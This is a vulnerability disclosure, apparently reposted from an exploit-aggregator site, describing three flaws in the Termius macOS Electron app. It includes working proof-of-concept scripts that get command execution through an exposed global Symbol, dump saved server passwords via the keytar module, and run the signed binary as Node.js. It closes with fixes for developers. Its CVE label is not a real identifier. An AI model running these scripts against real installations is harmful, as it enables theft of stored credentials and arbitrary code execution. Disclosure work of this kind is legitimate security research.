Share
## https://sploitus.com/exploit?id=E67A7E5A-D142-552E-B66F-057AD8F5EB3F
# Termius macOS Application Vulnerability Report (CVE-2026-Termius)

**Target**: Termius (macOS)
**Version Tested**: Latest (as of Jan 2026)
**Impact**: Remote Code Execution (RCE), Local Privilege Escalation (LPE), App Security Bypass

## ๐Ÿšจ Executive Summary
Three critical vulnerabilities were identified in the Termius macOS application that allow an attacker to:
1.  **Execute Arbitrary System Commands (RCE)** via a hidden backdoor Symbol exposed to the renderer.
2.  **Dump All Saved Passwords (LPE)** by abusing the exposed `keytar` native module.
3.  **Bypass Application Security Entirely** using the missing `ELECTRON_RUN_AS_NODE` fuse.

---

## 1. Critical: Remote Code Execution (RCE) via Hidden Symbol

### Vulnerability Details
The application exposes powerful Node.js modules (`child_process`, `fs`, `electron`) to the renderer process (the web interface part of the app). These modules are hidden behind a global `Symbol` in the `window` object to obscure them, but they are not securely isolated.

*   **Vulnerable Code Pattern**:
    ```javascript
    // In extracted app source
    window[Symbol.for("preloadedModulesKey")] = {
        child_process: require('child_process'),
        // ...
    };
    ```

### Exploit (PoC)
An attacker who achieves Cross-Site Scripting (XSS) can immediately escalate to RCE using this exposed symbol.

**`poc_rce_via_symbol.js`**:
```javascript
// 1. Reconstruct the hidden key using Symbol.for (Global Registry)
const hiddenKey = Symbol.for("preloadedModulesKey");

// 2. Access the exposed backdoor object
const backdoor = window[hiddenKey];

if (backdoor && backdoor.child_process) {
    console.log("RCE Target Acquired.");
    // 3. Execute arbitrary system command (e.g., Calculator)
    backdoor.child_process.exec("open -a Calculator");
}
```

---

## 2. Critical: Local Credential Dumping (LPE)

### Vulnerability Details
The `keytar` native node module, which Termius uses to interface with the macOS Keychain, is also exposed via the same hidden Symbol. This allows any script running within the application context (e.g., a malicious plugin, XSS, or local process injection) to query and retrieve **plaintext passwords** for all saved servers.

### Exploit (PoC)
**`poc_lpe_dump_creds.js`**:
```javascript
const hiddenKey = Symbol.for("preloadedModulesKey");
const modules = window[hiddenKey];

// Find the keytar module (name may vary slightly)
const keytarModuleName = Object.keys(modules).find(k => k.includes("keytar"));
const keytar = modules[keytarModuleName];

// Dump credentials for the default service
keytar.findCredentials("Termius").then(credentials => {
    console.log("๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ DUMPED CREDENTIALS ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ");
    console.table(credentials);
});
```

---

## 3. Critical: Missing Electron Fuse (`RunAsNode`)

### Vulnerability Details
The Termius binary does not disable the `ELECTRON_RUN_AS_NODE` fuse. This is a critical security misconfiguration that allows any local user to execute the signed Termius binary as a standard Node.js executable. This completely bypasses macOS Code Signing integrity checks for the application logic.

### Exploit (PoC)
**`poc_fuse.sh`**:
```bash
# Execute Termius as Node.js, running arbitrary code
ELECTRON_RUN_AS_NODE=1 /Applications/Termius.app/Contents/MacOS/Termius -e 'require("child_process").exec("open -a Calculator")'
```

---

## Remediation Recommendations (For Developers)

1.  **Disable Electron Fuses**: Explicitly disable `RunAsNode` and `EnableNodeCliInspectArguments` using `@electron/fuses` during build.
2.  **Remove Global Symbol Exposure**: Do not attach sensitive modules to `window` or `global`. Use `contextBridge.exposeInMainWorld` with a restricted API surface that only exposes necessary functions, not entire modules.
3.  **Sanitize IPC**: Ensure all Inter-Process Communication (IPC) is strictly typed and validated.

---
*Report generated by Antigravity Agent*